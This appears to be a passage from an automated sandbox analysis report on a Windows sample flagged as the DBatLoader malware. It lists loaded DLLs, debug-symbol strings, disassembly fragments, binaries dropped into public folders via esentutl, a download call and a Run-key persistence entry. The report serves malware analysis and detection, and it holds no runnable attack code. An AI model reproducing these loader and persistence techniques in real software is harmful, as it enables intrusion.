              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: jW3NEKvxH1.exeStatic file information: File size 1285120 > 1048576
              Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: jW3NEKvxH1.exe, 00000000.00000002.2290920143.000000007EE5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2228181025.000000007F040000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2227877290.000000007EA50000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: easinvoker.pdb source: jW3NEKvxH1.exe, jW3NEKvxH1.exe, 00000000.00000002.2290920143.000000007EE5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2280895111.0000000020A86000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2280895111.0000000020A3E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2280895111.0000000020A6E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2228181025.000000007F040000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2146235666.000000007F920000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2227877290.000000007EA50000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2145769596.000000007FC50000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2266110150.0000000002366000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: cmd.pdbUGP source: esentutl.exe, 00000004.00000003.2245097882.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, alpha.pif, 00000009.00000000.2272956424.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, alpha.pif, 0000000A.00000000.2294839083.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, alpha.pif, 0000000B.00000002.2390955236.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, alpha.pif, 00000011.00000002.2395576863.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, alpha.pif, 00000012.00000000.2403173477.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, alpha.pif, 00000014.00000000.2410473637.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, alpha.pif.4.dr
              Source: Binary string: ping.pdbGCTL source: esentutl.exe, 00000008.00000003.2265634215.00000000055D0000.00000004.00001000.00020000.00000000.sdmp, xpha.pif, 0000000C.00000002.2390214130.0000000000841000.00000020.00000001.01000000.00000008.sdmp, xpha.pif.8.dr
              Source: Binary string: easinvoker.pdbH source: jW3NEKvxH1.exe, 00000000.00000002.2290920143.000000007EE5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2228181025.000000007F040000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2227877290.000000007EA50000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: easinvoker.pdbGCTL source: jW3NEKvxH1.exe, 00000000.00000002.2280895111.0000000020A86000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2280895111.0000000020A3E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2280895111.0000000020A6E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2146235666.000000007F920000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2249226014.0000000021B2D000.00000004.00000020.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2249226014.0000000021B5E000.00000004.00000020.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2266672340.000000000282C000.00000004.00000020.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2145769596.000000007FC50000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2145952303.000000000282E000.00000004.00000020.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2266110150.0000000002366000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: cmd.pdb source: alpha.pif, alpha.pif, 0000000B.00000002.2390955236.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, alpha.pif, 00000011.00000002.2395576863.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, alpha.pif, 00000012.00000000.2403173477.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, alpha.pif, 00000014.00000000.2410473637.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, alpha.pif.4.dr
              Source: Binary string: ping.pdb source: esentutl.exe, 00000008.00000003.2265634215.00000000055D0000.00000004.00001000.00020000.00000000.sdmp, xpha.pif, xpha.pif, 0000000C.00000002.2390214130.0000000000841000.00000020.00000001.01000000.00000008.sdmp, xpha.pif.8.dr

              Data Obfuscation

              barindex
              Yara detected DBatLoader
              Source: Yara matchFile source: 0.2.jW3NEKvxH1.exe.2d30000.2.unpack, type: UNPACKEDPE
              Source: alpha.pif.4.drStatic PE information: 0xF8D87E17 [Thu Apr 20 00:53:43 2102 UTC]
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeCode function: 0_2_02D4894C LoadLibraryW,GetProcAddress,FreeLibrary,0_2_02D4894C
              Source: alpha.pif.4.drStatic PE information: section name: .didat
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeCode function: 0_2_02D363B0 push 02D3640Bh; ret 0_2_02D36403
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeCode function: 0_2_02D363AE push 02D3640Bh; ret 0_2_02D36403
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeCode function: 0_2_02D3C349 push 8B02D3C1h; ret 0_2_02D3C34E
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeCode function: 0_2_02D5C378 push 02D5C56Eh; ret 0_2_02D5C566
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeCode function: 0_2_02D36782 push 02D367C6h; ret 0_2_02D367BE
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeCode function: 0_2_02D36784 push 02D367C6h; ret 0_2_02D367BE
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeCode function: 0_2_02D5C570 push 02D5C56Eh; ret 0_2_02D5C566
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeCode function: 0_2_02D3C56C push ecx; mov dword ptr [esp], edx0_2_02D3C571
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeCode function: 0_2_02D4AADF push 02D4AB18h; ret 0_2_02D4AB10
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeCode function: 0_2_02D48AD8 push 02D48B10h; ret 0_2_02D48B08
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeCode function: 0_2_02D4AAE0 push 02D4AB18h; ret 0_2_02D4AB10
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeCode function: 0_2_02DA4A50 push eax; ret 0_2_02DA4B20
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeCode function: 0_2_02D3CBEC push 02D3CD72h; ret 0_2_02D3CD6A
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeCode function: 0_2_02D4886C push 02D488AEh; ret 0_2_02D488A6
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeCode function: 0_2_02D3C9DF push 02D3CD72h; ret 0_2_02D3CD6A
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeCode function: 0_2_02D3C98F push 02D3CD72h; ret 0_2_02D3CD6A
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeCode function: 0_2_02D46946 push 02D469F3h; ret 0_2_02D469EB
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeCode function: 0_2_02D46948 push 02D469F3h; ret 0_2_02D469EB
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeCode function: 0_2_02D42F60 push 02D42FD6h; ret 0_2_02D42FCE
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeCode function: 0_2_02D5D2FC push 02D5D367h; ret 0_2_02D5D35F
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeCode function: 0_2_02D3332C push eax; ret 0_2_02D33368
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeCode function: 0_2_02D5D0AC push 02D5D125h; ret 0_2_02D5D11D
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeCode function: 0_2_02D4306C push 02D430B9h; ret 0_2_02D430B1
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeCode function: 0_2_02D4306B push 02D430B9h; ret 0_2_02D430B1
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeCode function: 0_2_02D5D1F8 push 02D5D288h; ret 0_2_02D5D280
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeCode function: 0_2_02D5D144 push 02D5D1ECh; ret 0_2_02D5D1E4
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeCode function: 0_2_02D4F108 push ecx; mov dword ptr [esp], edx0_2_02D4F10D
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeCode function: 0_2_02E0D43F push ecx; ret 0_2_02E0D452
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeCode function: 0_2_02DEB586 push ecx; ret 0_2_02DEB599
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeCode function: 0_2_02D3D5A0 push 02D3D5CCh; ret 0_2_02D3D5C4
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeCode function: 0_2_02D4790C push 02D47989h; ret 0_2_02D47981

              Persistence and Installation Behavior

              barindex
              Drops PE files with a suspicious file extension
              Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\alpha.pifJump to dropped file
              Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\xpha.pifJump to dropped file
              Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\Libraries\Dlaybpxl.PIFJump to dropped file
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 6_2_02926128 ShellExecuteW,URLDownloadToFileW,6_2_02926128
              Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\alpha.pifJump to dropped file
              Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\xpha.pifJump to dropped file
              Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\Libraries\Dlaybpxl.PIFJump to dropped file
              Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\alpha.pifJump to dropped file
              Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\xpha.pifJump to dropped file

              Boot Survival

              barindex
              Drops PE files to the user root directory
              Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\alpha.pifJump to dropped file
              Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\xpha.pifJump to dropped file
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 6_2_02939BC4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,6_2_02939BC4
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run DlaybpxlJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run DlaybpxlJump to behavior
